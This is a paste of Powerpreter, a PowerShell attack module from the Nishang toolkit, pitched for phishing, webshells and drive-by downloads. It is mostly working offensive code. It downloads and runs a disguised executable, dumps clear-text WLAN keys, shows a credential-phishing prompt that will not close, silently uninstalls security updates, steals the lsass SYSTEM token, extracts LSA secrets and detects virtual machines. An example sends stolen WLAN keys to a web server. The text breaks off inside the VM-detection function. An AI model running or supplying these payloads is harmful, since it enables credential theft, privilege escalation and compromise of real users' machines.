· 6 years ago · Aug 05, 2019, 04:18 AM
1<#
2.SYNOPSIS
3Powerpreter is a module written in powershell. Powerpreter makes available maximum possible functionality of nishang
4in a single script. This is much helpful in scenarios like phishing attacks and webshells.
5
6.DESCRIPTION
7Powerpreter is a script module which makes it useful in scenarios like drive-by-download, document attachments, webshells etc. where one
8may like to pull all the functionality in Nishang in a single file or deployment is not easy to do. Powerpreter has persistence
9capabilities too. See examples for help in using it.
10
11.EXAMPLE
12PS > Import-Module .\Powerpreter.psm1
13PS> Get-Command -Module powerpreter
14
15The first command imports the module in current powershell session. Ignore the Unapproved verbs warning.
16The second command lists all the functions available with powerpreter.
17
18.EXAMPLE
19PS > Import-Module .\Powerpreter.psm1; Enable-DuplicateToken; Get-LSASecret
20
21Use above command to import powerpreter in current powershell session and execute the two functions.
22
23.EXAMPLE
24PS > Import-Module .\Powerpreter.psm1; Persistence
25
26Use above for reboot persistence
27
28.EXAMPLE
29PS > Import-Module .\Powerpreter.psm1
30PS > Get-WLAN-Keys | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
31
32Use above for exfiltration to a webserver which logs POST requests.
33
34
35.LINK
36http://labofapenetrationtester.com/
37https://github.com/samratashok/nishang
38
39
40#>
41######################################################Download a file to the target.##################################################
42
43function Download
44{
45
46<#
47.SYNOPSIS
48Payload to Download a file in current users temp directory.
49
50.DESCRIPTION
51This payload downloads a file to the given location.
52
53.PARAMETER URL
54The URL from where the file would be downloaded.
55
56.PARAMETER FileName
57Name of the file where download would be saved.
58
59.EXAMPLE
60PS > Download http://example.com/file.txt newfile.txt
61
62.LINK
63http://labofapenetrationtester.com/
64https://github.com/samratashok/nishang
65#>
66
67
68 [CmdletBinding()] Param(
69 [Parameter(Position = 0, Mandatory = $True)]
70 [String]
71 $URL,
72 [Parameter(Position = 1, Mandatory = $True)]
73 [String]
74 $FileName
75 )
76 $webclient = New-Object System.Net.WebClient
77 $file = "$env:temp\$FileName"
78 $webclient.DownloadFile($URL,$file)
79}
80
81#################################Download an executable in text format, convert it to exe and execute it.#################################
82function Download_Execute
83{
84
85<#
86.SYNOPSIS
87Payload to download an executable in text format, convert it to executable and execute.
88
89.DESCRIPTION
90This payload downloads an executable in text format, converts it to executable and execute.
91Use exetotext.ps1 script to change an executable to text
92
93.PARAMETER URL
94The URL from where the file would be downloaded.
95
96.EXAMPLE
97PS > Download_Execute http://example.com/file.txt
98
99.LINK
100http://labofapenetrationtester.com/
101https://github.com/samratashok/nishang
102#>
103
104
105
106 [CmdletBinding()] Param(
107 [Parameter(Position = 0, Mandatory = $True)]
108 [String]
109 $URL
110 )
111 $webclient = New-Object System.Net.WebClient
112 [string]$hexformat = $webClient.DownloadString($URL)
113 [Byte[]] $temp = $hexformat -split ' '
114 [System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
115 start-process -nonewwindow "$env:temp\svcmondr.exe"
116}
117
118##########################Dumps keys in clear text for saved WLAN profiles.#########################################
119function Get-Wlan-Keys
120{
121
122<#
123.SYNOPSIS
124Payload which dumps keys for WLAN profiles.
125
126.DESCRIPTION
127This payload dumps keys in clear text for saved WLAN profiles.
128The payload must be run from as administrator to get the keys.
129
130.EXAMPLE
131PS > Get-WLAN-Keys
132
133.LINK
134http://poshcode.org/1700
135https://github.com/samratashok/nishang
136#>
137
138
139 [CmdletBinding()]
140 Param ()
141 $wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
142 $exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
143 $pastevalue = $exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
144 $pastevalue
145}
146
147
148#################################################Gathers juicy information from the target##########################################################
149function Get-Information
150{
151
152
153<#
154.SYNOPSIS
155Payload which gathers juicy information from the target.
156
157.DESCRIPTION
158This payload extracts information form registry and some commands. The information available would be dependent on the privilege with
159which the script would be executed.
160
161.EXAMPLE
162PS > Get-Information
163
164.LINK
165http://labofapenetrationtester.com/
166https://github.com/samratashok/nishang
167#>
168
169 function registry_values($regkey, $regvalue,$child)
170 {
171 if ($child -eq "no"){$key = get-item $regkey}
172 else{$key = get-childitem $regkey}
173 $key |
174 ForEach-Object {
175 $values = Get-ItemProperty $_.PSPath
176 ForEach ($value in $_.Property)
177 {
178 if ($regvalue -eq "all") {$values.$value}
179 elseif ($regvalue -eq "allname"){$value}
180 else {$values.$regvalue;break}
181 }
182 }
183 }
184
185 $output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
186 $output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
187 $output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
188 $output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
189 $output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
190 $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
191 $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
192 $output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
193 $output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
194 $output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
195 $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
196 $output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
197 $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
198 $output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
199 $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
200 $output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
201 $output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
202 $output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
203 $output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")
204
205 $output
206
207}
208
209#####################################Displays a credential prompt and doesn't go away till valid credentials are entered##################
210
211function Invoke-CredentialsPhish
212{
213<#
214.SYNOPSIS
215Function which opens a user credential prompt.
216
217.DESCRIPTION
218This payload opens a prompt which asks for user credentials and
219does not go away till valid credentials are entered in the prompt.
220
221
222.EXAMPLE
223PS > Invoke-CredentialsPhish
224
225.LINK
226http://labofapenetrationtester.blogspot.com/
227https://github.com/samratashok/nishang
228#>
229
230[CmdletBinding()]
231Param ()
232
233 $ErrorActionPreference="SilentlyContinue"
234 Add-Type -assemblyname system.DirectoryServices.accountmanagement
235 $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
236 $domainDN = "LDAP://" + ([ADSI]"").distinguishedName
237 while($true)
238 {
239 $credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
240 if($credential)
241 {
242 $creds = $credential.GetNetworkCredential()
243 [String]$user = $creds.username
244 [String]$pass = $creds.password
245 [String]$domain = $creds.domain
246 $authlocal = $DS.ValidateCredentials($user, $pass)
247 $authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
248 if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
249 {
250 $output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
251 $output
252 break
253 }
254 }
255 }
256}
257
258
259
260
261
262####################################Silently removes updates for a target machine.########################################################
263###Thanks Trevor Sullivan
264###http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
265function Remove-Update {
266
267<#
268.SYNOPSIS
269Payload which silently removes updates for a target machine.
270
271.DESCRIPTION
272This payload removes updates from a tagret machine. This could be
273used to remove all updates, all security updates or a particular update.
274
275.PARAMETER KBID
276THE KBID of update you want to remove. All and Security are also validd.
277
278.EXAMPLE
279PS > Remove-Update All
280This removes all updates from the target.
281
282.EXAMPLE
283PS > Remove-Update Security
284This removes all security updates from the target.
285
286.EXAMPLE
287PS > Remove-Update KB2761226
288This removes KB2761226 from the target.
289
290.LINK
291http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
292https://github.com/samratashok/nishang
293#>
294
295
296 [CmdletBinding()] Param(
297 [Parameter(Position = 0, Mandatory = $True)]
298 [String]
299 $KBID
300 )
301 $HotFixes = Get-HotFix
302
303 foreach ($HotFix in $HotFixes)
304 {
305
306 if ($KBID -eq $HotFix.HotfixId)
307 {
308 $KBID = $HotFix.HotfixId.Replace("KB", "")
309 $RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
310 Write-Host "Removing $KBID from the target."
311 Invoke-Expression $RemovalCommand
312 break
313 }
314
315 if ($KBID -match "All")
316 {
317 $KBNumber = $HotFix.HotfixId.Replace("KB", "")
318 $RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
319 Write-Host "Removing update $KBNumber from the target."
320 Invoke-Expression $RemovalCommand
321
322 }
323
324 if ($KBID -match "Security")
325 {
326 if ($HotFix.Description -match "Security")
327 {
328
329 $KBSecurity = $HotFix.HotfixId.Replace("KB", "")
330 $RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
331 Write-Host "Removing Security Update $KBSecurity from the target."
332 Invoke-Expression $RemovalCommand
333 }
334 }
335
336
337 while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
338 {
339 Start-Sleep 3
340 Write-Output "Waiting for update removal to finish ..."
341 }
342 }
343
344}
345
346
347##########################Duplicates the Access token of lsass (SYSTEM) and sets it in the current process thread.###################################
348####Thanks Niklas Goude#####
349####http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
350function Enable-DuplicateToken {
351
352<#
353.SYNOPSIS
354Payload which duplicates the Access token of lsass and sets it in the current process thread.
355
356.DESCRIPTION
357This payload duplicates the Access token of lsass and sets it in the current process thread.
358The payload must be run with elevated permissions.
359
360.EXAMPLE
361PS > Enable-DuplicateToken
362
363.LINK
364http://www.truesec.com
365http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
366https://github.com/samratashok/nishang
367
368.NOTES
369Goude 2012, TreuSec
370#>
371
372
373[CmdletBinding()]
374param()
375
376$signature = @"
377 [StructLayout(LayoutKind.Sequential, Pack = 1)]
378 public struct TokPriv1Luid
379 {
380 public int Count;
381 public long Luid;
382 public int Attr;
383 }
384
385 public const int SE_PRIVILEGE_ENABLED = 0x00000002;
386 public const int TOKEN_QUERY = 0x00000008;
387 public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
388 public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
389
390 public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
391 public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
392 public const UInt32 TOKEN_DUPLICATE = 0x0002;
393 public const UInt32 TOKEN_IMPERSONATE = 0x0004;
394 public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
395 public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
396 public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
397 public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
398 public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
399 public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
400 TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
401 TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
402 TOKEN_ADJUST_SESSIONID);
403
404 public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
405 public const int ANYSIZE_ARRAY = 1;
406
407 [StructLayout(LayoutKind.Sequential)]
408 public struct LUID
409 {
410 public UInt32 LowPart;
411 public UInt32 HighPart;
412 }
413
414 [StructLayout(LayoutKind.Sequential)]
415 public struct LUID_AND_ATTRIBUTES {
416 public LUID Luid;
417 public UInt32 Attributes;
418 }
419
420
421 public struct TOKEN_PRIVILEGES {
422 public UInt32 PrivilegeCount;
423 [MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
424 public LUID_AND_ATTRIBUTES [] Privileges;
425 }
426
427 [DllImport("advapi32.dll", SetLastError=true)]
428 public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
429 SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
430
431
432 [DllImport("advapi32.dll", SetLastError=true)]
433 [return: MarshalAs(UnmanagedType.Bool)]
434 public static extern bool SetThreadToken(
435 IntPtr PHThread,
436 IntPtr Token
437 );
438
439 [DllImport("advapi32.dll", SetLastError=true)]
440 [return: MarshalAs(UnmanagedType.Bool)]
441 public static extern bool OpenProcessToken(IntPtr ProcessHandle,
442 UInt32 DesiredAccess, out IntPtr TokenHandle);
443
444 [DllImport("advapi32.dll", SetLastError = true)]
445 public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
446
447 [DllImport("kernel32.dll", ExactSpelling = true)]
448 public static extern IntPtr GetCurrentProcess();
449
450 [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
451 public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
452 ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
453"@
454
455 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
456 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
457 Write-Warning "Run the Command as an Administrator"
458 Break
459 }
460
461 Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
462 $adjPriv = [AdjPriv.AdjPriv]
463 [long]$luid = 0
464
465 $tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
466 $tokPriv1Luid.Count = 1
467 $tokPriv1Luid.Luid = $luid
468 $tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
469
470 $retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
471
472 [IntPtr]$htoken = [IntPtr]::Zero
473 $retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
474
475
476 $tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
477 $retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
478
479 if(-not($retVal)) {
480 [System.Runtime.InteropServices.marshal]::GetLastWin32Error()
481 Break
482 }
483
484 $process = (Get-Process -Name lsass)
485 [IntPtr]$hlsasstoken = [IntPtr]::Zero
486 $retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
487
488 [IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
489 $retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
490
491 $retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
492 if(-not($retVal)) {
493 [System.Runtime.InteropServices.marshal]::GetLastWin32Error()
494 }
495}
496
497######################################################Dumps LSA Secrets from the target#############################################
498####Thanks Niklas Goude#####
499####http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
500function Get-LsaSecret {
501
502<#
503.SYNOPSIS
504Payload which extracts LSA Secrets from local computer.
505
506.DESCRIPTION
507Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
508The payload must be run with elevated permissions, in 32-bit mode and requires
509permissions to the security key in HKLM. The permission could be obtained by using
510Enable-DuplicateToken payload.
511
512.PARAMETER RegistryKey
513Name of Key to Extract. if the parameter is not used, all secrets will be displayed.
514
515.EXAMPLE
516PS > Get-LsaSecret
517
518.EXAMPLE
519PS > Get-LsaSecret -RegistryKey KeyName
520Read contents of the key mentioned as parameter.
521
522.LINK
523http://www.truesec.com
524http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
525https://github.com/samratashok/nishang
526
527.NOTES
528Goude 2012, TreuSec
529#>
530
531 [CmdletBinding()] Param (
532 [Parameter(Position = 0, Mandatory=$False)]
533 [String]
534 $RegistryKey
535 )
536
537 Begin {
538 # Check if User is Elevated
539 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
540 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
541 Write-Warning "Run the Command as an Administrator"
542 Break
543 }
544
545 # Check if Script is run in a 32-bit Environment by checking a Pointer Size
546 if([System.IntPtr]::Size -eq 8) {
547 Write-Warning "Run PowerShell in 32-bit mode"
548 Break
549 }
550
551
552
553 # Check if RegKey is specified
554 if([string]::IsNullOrEmpty($registryKey)) {
555 [string[]]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
556 }
557
558 # Create Temporary Registry Key
559 if( -not(Test-Path "HKLM:\\SECURITY\Policy\Secrets\MySecret")) {
560 mkdir "HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
561 }
562
563 $signature = @"
564 [StructLayout(LayoutKind.Sequential)]
565 public struct LSA_UNICODE_STRING
566 {
567 public UInt16 Length;
568 public UInt16 MaximumLength;
569 public IntPtr Buffer;
570 }
571
572 [StructLayout(LayoutKind.Sequential)]
573 public struct LSA_OBJECT_ATTRIBUTES
574 {
575 public int Length;
576 public IntPtr RootDirectory;
577 public LSA_UNICODE_STRING ObjectName;
578 public uint Attributes;
579 public IntPtr SecurityDescriptor;
580 public IntPtr SecurityQualityOfService;
581 }
582
583 public enum LSA_AccessPolicy : long
584 {
585 POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
586 POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
587 POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
588 POLICY_TRUST_ADMIN = 0x00000008L,
589 POLICY_CREATE_ACCOUNT = 0x00000010L,
590 POLICY_CREATE_SECRET = 0x00000020L,
591 POLICY_CREATE_PRIVILEGE = 0x00000040L,
592 POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
593 POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
594 POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
595 POLICY_SERVER_ADMIN = 0x00000400L,
596 POLICY_LOOKUP_NAMES = 0x00000800L,
597 POLICY_NOTIFICATION = 0x00001000L
598 }
599
600 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
601 public static extern uint LsaRetrievePrivateData(
602 IntPtr PolicyHandle,
603 ref LSA_UNICODE_STRING KeyName,
604 out IntPtr PrivateData
605 );
606
607 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
608 public static extern uint LsaStorePrivateData(
609 IntPtr policyHandle,
610 ref LSA_UNICODE_STRING KeyName,
611 ref LSA_UNICODE_STRING PrivateData
612 );
613
614 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
615 public static extern uint LsaOpenPolicy(
616 ref LSA_UNICODE_STRING SystemName,
617 ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
618 uint DesiredAccess,
619 out IntPtr PolicyHandle
620 );
621
622 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
623 public static extern uint LsaNtStatusToWinError(
624 uint status
625 );
626
627 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
628 public static extern uint LsaClose(
629 IntPtr policyHandle
630 );
631
632 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
633 public static extern uint LsaFreeMemory(
634 IntPtr buffer
635 );
636"@
637
638 Add-Type -MemberDefinition $signature -Name LSAUtil -Namespace LSAUtil
639 }
640
641 Process{
642 foreach($key in $RegistryKey) {
643 $regPath = "HKLM:\\SECURITY\Policy\Secrets\" + $key
644 $tempRegPath = "HKLM:\\SECURITY\Policy\Secrets\MySecret"
645 $myKey = "MySecret"
646 if(Test-Path $regPath) {
647 Try {
648 Get-ChildItem $regPath -ErrorAction Stop | Out-Null
649 }
650 Catch {
651 Write-Error -Message "Access to registry Denied, run as NT AUTHORITY\SYSTEM" -Category PermissionDenied
652 Break
653 }
654
655 if(Test-Path $regPath) {
656 # Copy Key
657 "CurrVal","OldVal","OupdTime","CupdTime","SecDesc" | ForEach-Object {
658 $copyFrom = "HKLM:\SECURITY\Policy\Secrets\" + $key + "\" + $_
659 $copyTo = "HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
660
661 if( -not(Test-Path $copyTo) ) {
662 mkdir $copyTo | Out-Null
663 }
664 $item = Get-ItemProperty $copyFrom
665 Set-ItemProperty -Path $copyTo -Name '(default)' -Value $item.'(default)'
666 }
667 }
668 # Attributes
669 $objectAttributes = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
670 $objectAttributes.Length = 0
671 $objectAttributes.RootDirectory = [IntPtr]::Zero
672 $objectAttributes.Attributes = 0
673 $objectAttributes.SecurityDescriptor = [IntPtr]::Zero
674 $objectAttributes.SecurityQualityOfService = [IntPtr]::Zero
675
676 # localSystem
677 $localsystem = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
678 $localsystem.Buffer = [IntPtr]::Zero
679 $localsystem.Length = 0
680 $localsystem.MaximumLength = 0
681
682 # Secret Name
683 $secretName = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
684 $secretName.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($myKey)
685 $secretName.Length = [Uint16]($myKey.Length * [System.Text.UnicodeEncoding]::CharSize)
686 $secretName.MaximumLength = [Uint16](($myKey.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)
687
688 # Get LSA PolicyHandle
689 $lsaPolicyHandle = [IntPtr]::Zero
690 [LSAUtil.LSAUtil+LSA_AccessPolicy]$access = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
691 $lsaOpenPolicyHandle = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]$localSystem, [ref]$objectAttributes, $access, [ref]$lsaPolicyHandle)
692
693 if($lsaOpenPolicyHandle -ne 0) {
694 Write-Warning "lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle"
695 Continue
696 }
697
698 # Retrieve Private Data
699 $privateData = [IntPtr]::Zero
700 $ntsResult = [LSAUtil.LSAUtil]::LsaRetrievePrivateData($lsaPolicyHandle, [ref]$secretName, [ref]$privateData)
701
702 $lsaClose = [LSAUtil.LSAUtil]::LsaClose($lsaPolicyHandle)
703
704 $lsaNtStatusToWinError = [LSAUtil.LSAUtil]::LsaNtStatusToWinError($ntsResult)
705
706 if($lsaNtStatusToWinError -ne 0) {
707 Write-Warning "lsaNtsStatusToWinError: $lsaNtStatusToWinError"
708 }
709
710 [LSAUtil.LSAUtil+LSA_UNICODE_STRING]$lusSecretData =
711 [LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure($privateData, [System.Type][LSAUtil.LSAUtil+LSA_UNICODE_STRING])
712
713 Try {
714 [string]$value = [System.Runtime.InteropServices.marshal]::PtrToStringAuto($lusSecretData.Buffer)
715 $value = $value.SubString(0, ($lusSecretData.Length / 2))
716 }
717 Catch {
718 $value = ""
719 }
720
721 if($key -match "^_SC_") {
722 # Get Service Account
723 $serviceName = $key -Replace "^_SC_"
724 Try {
725 # Get Service Account
726 $service = Get-WmiObject -Query "SELECT StartName FROM Win32_Service WHERE Name = '$serviceName'" -ErrorAction Stop
727 $account = $service.StartName
728 }
729 Catch {
730 $account = ""
731 }
732 } else {
733 $account = ""
734 }
735
736 # Return Object
737 $obj = New-Object PSObject -Property @{
738 Name = $key;
739 Secret = $value;
740 Account = $Account
741 }
742
743 $pastevalue = $obj | Select-Object Name, Account, Secret, @{Name="ComputerName";Expression={$env:COMPUTERNAME}}
744 $pastevalue
745
746 } else {
747 Write-Error -Message "Path not found: $regPath" -Category ObjectNotFound
748 }
749 }
750 }
751 end {
752 if(Test-Path $tempRegPath) {
753 Remove-Item -Path "HKLM:\\SECURITY\Policy\Secrets\MySecret" -Recurse -Force
754 }
755 if($exfil -eq $True)
756 {
757 Do-Exfiltration "LSA Secrets: " "$pastevalue" "$username" "$password" "$dev_key" "$keyoutoption"
758 }
759 }
760
761 }
762
763######################################################Converts Base64 string or file to plain.##################################################
764function Base64ToString
765{
766
767<#
768.SYNOPSIS
769Helper funciton which decodes a base64 string to readable.
770
771.DESCRIPTION
772This payload decodes a base64 string to readable.
773
774.PARAMETER Base64Strfile
775The filename which contains base64 string to be decoded.
776Use the parameter -IsString while using a string instead of file.
777
778.EXAMPLE
779PS > Base64ToString base64.txt
780
781.EXAMPLE
782PS > Base64ToString dGVzdGVzdA== -IsString
783
784.LINK
785http://labofapenetrationtester.com/
786https://github.com/samratashok/nishang
787#>
788
789 [CmdletBinding()] Param(
790 [Parameter(Position = 0, Mandatory = $True)]
791 [String]
792 $Base64Strfile,
793
794 [Switch]
795 $IsString
796 )
797
798 if($IsString -eq $true)
799 {
800
801 $base64string = [System.Convert]::FromBase64String($Base64Strfile)
802
803 }
804 else
805 {
806 $base64string = [System.Convert]::FromBase64String((Get-Content $Base64Strfile))
807 }
808
809 $decodedstring = [System.Text.Encoding]::Unicode.GetString($base64string)
810 $decodedstring
811 }
812
813
814
815########################################################Detects whether it is in a known virtual machine.###########################
816###Based on CheckVM post module in msf by Carlos Perez
817function Check-VM
818{
819
820<#
821.SYNOPSIS
822Helper function which detects whether it is running in a known virtual machine.
823
824.DESCRIPTION
825This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
826Xen and QEMU for detecting the environment.
827
828.EXAMPLE
829PS > Check-VM
830
831.LINK
832http://labofapenetrationtester.com/
833https://github.com/samratashok/nishang
834
835.NOTES
836The script draws heavily from checkvm.rb post module from msf.
837https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
838#>
839 [CmdletBinding()] Param()
840 $ErrorActionPreference = "SilentlyContinue"
841 #Hyper-V
842 $hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
843 if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
844 {
845 $hypervm = $true
846 }
847
848 if (!$hypervm)
849 {
850 $hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
851 if ($hyperv -match "vrtual")
852 {
853 $hypervm = $true
854 }
855 }
856
857 if (!$hypervm)
858 {
859 $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
860 if ($hyperv -match "vrtual")
861 {
862 $hypervm = $true
863 }
864 }
865
866 if (!$hypervm)
867 {
868 $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
869 if ($hyperv -match "vrtual")
870 {
871 $hypervm = $true
872 }
873 }
874
875 if (!$hypervm)
876 {
877 $hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
878 if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
879 {
880 $hypervm = $true
881 }
882 }
883
884 if ($hypervm)
885 {
886
887 "This is a Hyper-V machine."
888
889 }
890
891 #VMWARE
892
893 $vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
894 if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
895 {
896 $vmwarevm = $true
897 }
898
899 if (!$vmwarevm)
900 {
901 $vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
902 if ($vmware -match "vmware")
903 {
904 $vmwarevm = $true
905 }
906 }
907
908 if (!$vmwarevm)
909 {
910 $vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
911 if ($vmware -match "vmware")
912 {
913 $vmwarevm = $true
914 }
915 }
916
917 if (!$vmwarevm)
918 {
